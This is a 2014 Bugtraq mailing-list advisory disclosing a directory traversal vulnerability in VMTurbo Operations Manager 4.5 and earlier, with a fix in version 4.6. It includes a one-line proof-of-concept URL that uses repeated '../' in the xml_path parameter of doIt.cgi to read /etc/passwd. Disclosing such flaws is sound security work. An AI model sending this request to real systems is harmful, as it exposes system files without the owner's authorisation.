[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Directory Traversal Vulnerability in VMTurbo Operations Manager 4.5 or earlier

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Directory Traversal Vulnerability in VMTurbo Operations Manager 4.5 or earlier
From: jpecou@xxxxxxxxx
Date: Thu, 8 May 2014 14:38:15 GMT

Product: VM Turbo Operations Manager
Vendor: VM Turbo
Vulnerable Version(s): 4.5.x earlier
Tested Version: 4.0
Advisory Publication: April 11, 2014 
Vendor Notification: April 11, 2014 
Public Disclosure: May 8, 2014 
Vulnerability Type: Directory Traversal

Discovered and Provided: (Jamal Pecou) Security Focus ( 
https://www.securityfocus.com/ )

------------------------------------------------------------------------
-----------------------

Advisory Details:

A vulnerability affecting ?/cgi-bin/help/doIt.cgi" in VM Turbo Operations 
Manager allows directory traversal when the URL encoded POST input ?xml_path? 
was set to ?../../../../../../../../../../etc/passwd? we could see the contents 
of this file. 


The following exploitation example displays the contents of /etc/passwd

http://[host]/cgi-bin/help/doIt.cgi?FUNC=load_xml_file&xml_path=../../../../../../../../../../etc/passwd

------------------------------------------------------------------------
-----------------------

Solution:

 The vendor has released a fix for this vulnerability in version 4.6.

References:

[1] 
https://support.vmturbo.com/hc/en-us/articles/203170127-VMTurbo-Operations-Manager-v4-6-Announcement

Prev by Date: [ MDVSA-2014:083 ] mediawiki
Next by Date: [SECURITY] [DSA 2925-1] rxvt-unicode security update
Previous by thread: [ MDVSA-2014:083 ] mediawiki
Next by thread: [SECURITY] [DSA 2925-1] rxvt-unicode security update
Index(es):
- Date
- Thread